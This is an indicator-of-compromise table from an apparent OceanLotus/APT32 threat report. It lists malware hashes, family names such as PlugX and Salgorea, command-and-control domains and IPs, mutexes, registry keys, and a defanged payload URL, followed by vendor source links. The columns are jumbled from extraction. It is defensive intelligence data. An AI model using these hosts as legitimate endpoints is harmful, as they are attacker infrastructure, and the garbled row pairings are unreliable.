ce478c8aabc980083a62f4ce4b040f1068e648d7cf6f3f94f283fd620eb8da24 ns1.clearddns.com, search.ultraqueryns. Creates Mutex (843f0711e1a54ac6009246ada311c06c_%USERNAME%) biz, 193.169.245.166:53 aea9fbb5b3cd8fcd48add7d9ca6ed639 ea2c54dc6a9cb33817f9967a20a841764e82b9bb399d6a8791c1fcb0dc6faa2f VT csc.exe EXE Denis 184136 11/13/05 21:52 3/24/17 8:48 z.gl-appspot.org, z.nsquery.net, z.facebook- Creates Mutex (8633f77ce68d3a4ce13b3654701d2daf_%USERNAME%) cdn.net, z.tonholding.com 018433e8e815d9d2065e57b759202edc 12c2c3566c29f80478277e0f96b79fc85b9e86ebf16505d8f2d7877a6204f860 8 SwUSB.exe EXE Denis 201216 4/26/12 20:04 3/1/17 16:35 z.gl-appspot.org Creates Mutex (8633f77ce68d3a4ce13b3654701d2daf_%USERNAME%) c8eaa7653991bb8eccbd436442f95003 f58a9713e22318e0b7bec000b886b378af5aa06a7c960496a04d3e74db368fd3 VT SwUSB.exe EXE Denis 179202 4/26/12 20:04 9/7/16 2:45 z.teriava.com Creates Mutex (45f0b79fb0ddda42a5af2aad9de927a2_%USERNAME%) ba49eb3b3b5b747b7e0331855eba83f5 ff37aff31e0dcc9bc51b29fc5ea1e671de6e59d1fca51c681b3b0d52687ae73f VT CSRSS.Exe EXE Denis 179200 6/22/07 18:17 8/12/16 20:37 z.teriava.com f7af180d088f6b86509c2bea2d5cca6a 5d0baa165715d710edd4b202d9e6494f1061159521ba0b2474556e3bfe481ba1 VT WerFault.exe EXE Denis 202240 6/22/07 18:17 5/17/17 4:14 z.vieweva.com, z.notificeva.com, Creates Mutex (45f0b79fb0ddda42a5af2aad9de927a2_%USERNAME%) z.tulationeva.com, z.teriava.com 1a4d58e281103fea2a4ccbfab93f74d2 f5872f49943c39b73026fc3982b85330953a138cc27c23487a28103337bfdbb5 8 CiscoEapFast.exe EXE Denis 179202 8/18/12 19:12 3/3/17 6:08 cpanel.cenjungle.com (198.20.167.132), Creates mutex (zzzzzaeed0484b6102964ccd8cccd38a_%USERNAME%), reg values phpmyadmin.centarget.com, repo.blecanyon.com under "HKCU\Control Panel\Accessibility\Keyboard Layout_" - "On" and "FA" 1ff1263633b46e662504c3fc5889c7fc 5e1d794cb53d10f3e0759347254a7a6c54005da1a4382574653fca5bd6d7ef88 VT tzutil.exe EXE Remy Windshield 233472 4/19/04 18:16 3/15/17 17:22 fox.ailloux.com (185.29.10.24), cnn.befmann. Creates mutex (89293C30-2C3E-4C21-8AF0-5070A19DCE6B_%USERNAME%), com, news.coleope.com, cloud.sicaogler.com reg values under "HKCU\Printers\DevHP" - "FontWeight", "FX" a532040810d0e34a28f20347807eb89f 9b237ec0a5e87be62c32ad795c2b5ff43134de4f9426398593bd7efcff90cf98 VT clang_compiler32.dll, clang_ DLL Remy Windshield 232448 11/2/05 1:32 5/11/17 14:29 fox.ailloux.com (185.29.10.24), cnn.befmann. Creates mutex (89293C30-2C3E-4C21-8AF0-5070A19DCE6B_%USERNAME%), Infected with Virus! compiler32.exe, OpenCL SDK com, news.coleope.com, cloud.sicaogler.com reg values under "HKCU\Printers\DevHP" - "FontWeight", "FX" fbd96ee03328af76dd6ffe161544e2ed cb62e646b5b62db41b3b28709ea49ea4a941599a00cbde1bca2144f11fac8422 VT clang_compiler32.dll, clang_ EXE Remy Windshield 260096 12/4/09 13:35 5/18/17 17:37 compiler32.exe, OpenCL SDK 93da064e3fc4422c63fecca93ee1b157 71bb21f0f778a27b2b4590aba090704802330208a44b079ffab64b790dfd5c8c 7 Sylog.bin data encrypted Denis 1007808 3/14/18 11:17 c212074b43b6ef811f2a8fb72e670e0c 4ce7c9e9ca6f785921921de4d0b75c5436cd0d760ac71ddb30b8c5a610ae34dd 7 McUtil.dll DLL PlugX / Korplug 344064 11/13/06 9:58 2/18/18 18:42 b65b82eddcecd719c55d6d222926e648 06dec0082eac094dc0b4b3de8854f190f1d3112dada0d414d9a085a0ee309199 7 rastls.dll, {5248F13C-85F0-42DF- DLL Salgorea (Eset) 79872 9/13/08 13:38 10/5/17 18:18 4ab2df974e5e563f611d7267916a00c18f819f5b8770ffcfadc5e1959047fb8e 860D-1723EEAA4F90}.dll a69c31b0b86f43c7f7bf7a45d22f246f 0009f9789f0b3fd20e9a2c48ab36bbca322cdf050fc8d3ebe7e12b470a0e4551 VT rastls.dll, {5248F13C-85F0-42DF- DLL Salgorea (Eset) 79872 9/13/08 13:38 10/9/17 18:55 c70aceebfe9df5541e3a323928867d98ae6edcbd6ab7114b9f2da4dd45502cfe 860D-1723EEAA4F90}.dll e07ce38a0e6da5ca974f87006de2e826 34ae9148a4db9993110e4fe4a0f8e9db17790b036ea0f5c236f53cbf845dd2a3 VT rastls.dll, {5248F13C-85F0-42DF- DLL Salgorea (Eset) 79872 9/13/08 13:38 9/30/17 3:38 bdb83301a470d202480274df161638f83f8f26e7dda131a11b89a5a3d8259c73 860D-1723EEAA4F90}.dll f769ac32c8550a27fd77a664103fcc4b 3cc166273476ebaf4d083e444914bdecf39a3faac5d049800859988b9c9c91b1 VT rastls.dll, {5248F13C-85F0-42DF- DLL Salgorea (Eset) 79872 9/13/08 13:38 9/2/17 6:45 b2e7b34ece74ff87845c55068dff207552bc90d28f6622c52d7aa54347255700 860D-1723EEAA4F90}.dll 90a9df6643a8976883e7f5a473ce8349 6b560e2fc0be10d0ffd9e5440101f083ed7f5328735df79fd6c537c61bfcfe88 VT rastls.dll, {5248F13C-85F0-42DF- DLL Salgorea (Eset) 79872 9/13/08 13:38 9/29/17 7:37 890e5bd2650399d7fc3b543e8d1e65c0385f4d6003186245c8574c1913ca5d64 860D-1723EEAA4F90}.dll 2d9d166b4d40c220df895235c06777b0 7477db2fab4dc77213008682e3302d6dd30e3963885f0a156d14bd067fa5b5cc VT rastls.dll, {5248F13C-85F0-42DF- DLL Salgorea (Eset) 79872 9/13/08 13:38 9/23/17 13:51 30d06e100215461ad1c5b3bdb7a3b65c61f0ad27ebd733c7a37f40bd4b64932e 860D-1723EEAA4F90}.dll 8de7d600d83bb3a6d2dd42932eed6f92 75835af4e772ead0e9faddd59328c44ab9a5b80f7df64f7d2ef18f94483c08de VT rastls.dll, {5248F13C-85F0-42DF- DLL Salgorea (Eset) 79872 9/13/08 13:38 11/27/17 2:51 85b2d3c74e6a662657f04ec58e5519338fd16fa955773c826e34e3eefd06e3c2 860D-1723EEAA4F90}.dll 317d959d0ea2ba06789255301c32032d 73bdfeed3b4385fbc237fd2d8b60a1e0e13b147046b951ef9f237cecd2d7006d VT rastls.dll, {7032F494-0562-4422- DLL Salgorea (Eset) 79872 9/17/08 19:34 12/3/17 7:17 857462a7a466e1f6934b6b313d7d3adaf14ca92fc8eabd820f6bf1eda29c093c 9C39-14230E095C52}.dll b424c855a9494409b6e0e70d87ffd558 0528e2fa94f3b1253fe6c6a53452364568767253954630ab5cc141e41690ea43 VT rastls.dll, {7032F494-0562-4422- DLL Salgorea (Eset) 79872 9/17/08 19:34 9/8/17 9:12 8f00c2dab8cc32e0052b7779de0bdc8faa385e890415555e86efdfc3b01cc504 9C39 14230E095C52} dll ----- **yp** **p** **p** a04be5ca8df86ee9b93974f4da88548e 26529af7782a902c04ae01898c8b14c9f01302165335858ad666b10532584254 VT rastls.dll, {7032F494-0562-4422- DLL Salgorea (Eset) 79872 9/17/08 19:34 9/13/17 4:37 a17d4568ad5f745d36fc17846d3e0edf63d4e3c9fccb9861579e957f7a560217 9C39-14230E095C52}.dll a2b45cae93603d04592a684285ebe7b9 30d6a4b9c41225c22b3d1bf2f1eab3d1c57c8b1a69502eab076a4f97f14023ac VT rastls.dll, {7032F494-0562-4422- DLL Salgorea (Eset) 79872 9/17/08 19:34 9/15/17 19:29 198e3c9e6f3dbcf586ac90486187ebfffdeb1c5d663131fc60c45451b04cce7a 9C39-14230E095C52}.dll 4185f19a957f870ce6b511c4f86d7c06 08744b41169f163d1fde59f98f4702cef46632a50b7c2bcbda60ae6626170a3b VT rastls.dll, {7032F494-0562-4422- DLL Salgorea (Eset) 79360 9/13/08 13:28 8/15/17 3:42 5091430fac8b608ac612c35a1e29ce47cdeb22429657460dddc660727806b511 9C39-14230E095C52}.dll 58febe3cdd3a523bc2a5162ad302c49f e22d2c3e78908a2a8301755da5927132f24bd3a2d5957b7d379febd46b20d163 VT rastls.dll, {7032F494-0562-4422- DLL Salgorea (Eset) 79360 9/13/08 13:28 8/3/17 19:48 36c62261ba32b9a2d81c1c3ac9e317c52c76ebe57cecd620ce646c7c94f994f9 9C39-14230E095C52}.dll 6a7abc717abb17ce60a922057a2e9386 16a608f88ef13ebdb2287482aa29629e7b34664cf133ab7d653c15808e92f8fa VT rastls.dll, {7032F494-0562-4422- DLL Salgorea (Eset) 79360 9/13/08 13:28 7/28/17 10:14 5dff6bc9e8898f2ed09ced9ac23b7e4d867e90c3efbe42726edcb01ecb0b1673 9C39-14230E095C52}.dll f9c820264597d8f649d88522dd66f222 13221bc0b7ee8f2ee265231134baa29624b7480e577f194b84a8652c67403150 VT rastls.dll, {7032F494-0562-4422- DLL Salgorea (Eset) 79360 9/19/17 4:30 12/19/17 12:20 c55ff0bb70b704eff1eee8d21a6c2e6fbc06eb1d5fcbb030fdaebebd9f8decf3 9C39-14230E095C52}.dll f0be949e85e5c4e8a6bd4d94c90ab9b3 a40741b588147021ec0e9908857a2938f1d9bab73ebde18d2ea77feac053b1dc VT rastls.dll, {7032F494-0562-4422- DLL Salgorea (Eset) 79360 9/19/17 4:30 11/17/17 6:19 c24e6d402a5adf1ece2d6a3dbe270e0904d43119d68e7862555505825a273cad 9C39-14230E095C52}.dll 0fdf7fa5c5f978a08f493e777510f1f2d86a368f83696b3ba46e43fe9c3642f8 VT PlugX / Korplug 4b9a4571651af706c222a50056e4343eec75d4935f888102955bbececd94fd98 VT PlugX / Korplug 7f20a38a265f074be3cfced5fffc04c8dc2ebb4dea02ba3ebb4d3d23d7d4d2fd VT PlugX / Korplug a2155529411a2ae173a65b818b69df9628a4093417f8991683f06aa310dbb5bf VT PlugX / Korplug ef095eb5790495aa6a18efc31cfc6087df187ec749162336213eab0f3ba453ea VT PlugX / Korplug f18e0335dc23604632b9af5f174ab2f53bfcfd500fd1d470d283835fad189005 VT PlugX / Korplug ilmlakgn.traveroyce.com (198.50.234.111) b45203c7cbc35a092e7e8749bf17e4a7 c70aceebfe9df5541e3a323928867d98ae6edcbd6ab7114b9f2da4dd45502cfe VT FontExt.dll EXE Denis 1496064 5/21/10 10:33 10/9/17 15:03 0009f9789f0b3fd20e9a2c48ab36bbca322cdf050fc8d3ebe7e12b470a0e4551 hieryells.com (192.34.109.173) ba4268f8694be7a252b917a692d157c3 b2e7b34ece74ff87845c55068dff207552bc90d28f6622c52d7aa54347255700 VT Thu moi tham du Hoi thao-Final-FRONT-PAGE.exe EXE Denis 8742400 4/13/07 19:11 9/2/17 6:43 3cc166273476ebaf4d083e444914bdecf39a3faac5d049800859988b9c9c91b1 virginiaar.com (198.50.234.111) 8d6e7c359776cdb16aaf9630b63c535f 85b2d3c74e6a662657f04ec58e5519338fd16fa955773c826e34e3eefd06e3c2 VT FontExt.dll EXE Denis 1569792 5/21/10 10:33 11/26/17 18:35 75835af4e772ead0e9faddd59328c44ab9a5b80f7df64f7d2ef18f94483c08de tsworthoa.com (164.132.45.67) 87d108b2763ce08d3f611f7d240597ec 857462a7a466e1f6934b6b313d7d3adaf14ca92fc8eabd820f6bf1eda29c093c VT GoogleUpdateSetup.exe EXE Denis 2707456 11/16/11 9:54 12/5/17 4:35 73bdfeed3b4385fbc237fd2d8b60a1e0e13b147046b951ef9f237cecd2d7006d arinaurna.com (173.209.43.20) 2f5a12c23e90f769b388d1edace2371d 36c62261ba32b9a2d81c1c3ac9e317c52c76ebe57cecd620ce646c7c94f994f9 VT WinWord.exe EXE Denis 1499136 9/17/08 19:34 9/2/17 2:20 e22d2c3e78908a2a8301755da5927132f24bd3a2d5957b7d379febd46b20d163 dreyoddu.com (46.183.222.84) a01fda63947b9b0bb29e8dd8e258e5c8 c55ff0bb70b704eff1eee8d21a6c2e6fbc06eb1d5fcbb030fdaebebd9f8decf3 VT WinWord.exe EXE Denis 1815040 5/21/10 10:33 12/19/17 12:17 13221bc0b7ee8f2ee265231134baa29624b7480e577f194b84a8652c67403150 "Chinanetworkvub.info, womenofchina. info, 185.64.104.229 N/A 4331c18483950c9a48a71a9b1d9b26ad1e2216d170898c22494900c8fc5e36dd 4 Backdoor http[:]//lawph[.]info/download/images/user.gif System.galaburner.info, mx.powergala.info, smtp.galamower.com, help.galaspot.net N/A 9d57ce4d1578fe7b3651a98b41a62888a1b228d6152acfd3b5c3e0b4c81c77ad 4 user.gif PS1 Windshield (?) 7e68371ba3a988ff88e0fb54e2507f0d N/A 1 install_flashplayer.exe 9fea62c042a8eda1d3f5ae54bad1e959 N/A 1 sinopec.exe 486bb089b22998ec2560afa59008eafa N/A 1 b778d0de33b66ffdaaf76ba01e7c5b7b N/A 1 USBDeview.exe 53e5718adf6f5feb2e3bb3396a229ba8 N/A 1 DSC00229.exe d39edc7922054a0f14a5b000a28e3329 N/A 1 install_flashplayer13x37.exe **Source References** Cy Cylance 4 https://mp.weixin.qq.com/s?__biz=MzI5NjA0NjI5MQ%3D%3D&idx=1&mid=2650164408&sn=a5abc26a34f4f21c20619146686670bf 7 https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf VT VirusTotal 3 https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/ 8 https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/ 1 http://www.freebuf.com/news/topnews/68622.html 5 http://www.freebuf.com/articles/network/146552.html 9 https://www2.cybereason.com/asset/61:research-cobalt-kitty-profile-iocs 2 https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html 6 https://mp.weixin.qq.com/s/UIV0YaIlSJLcYT32XJQPlg 10 http://www.freebuf.com/articles/others-articles/153666.html -----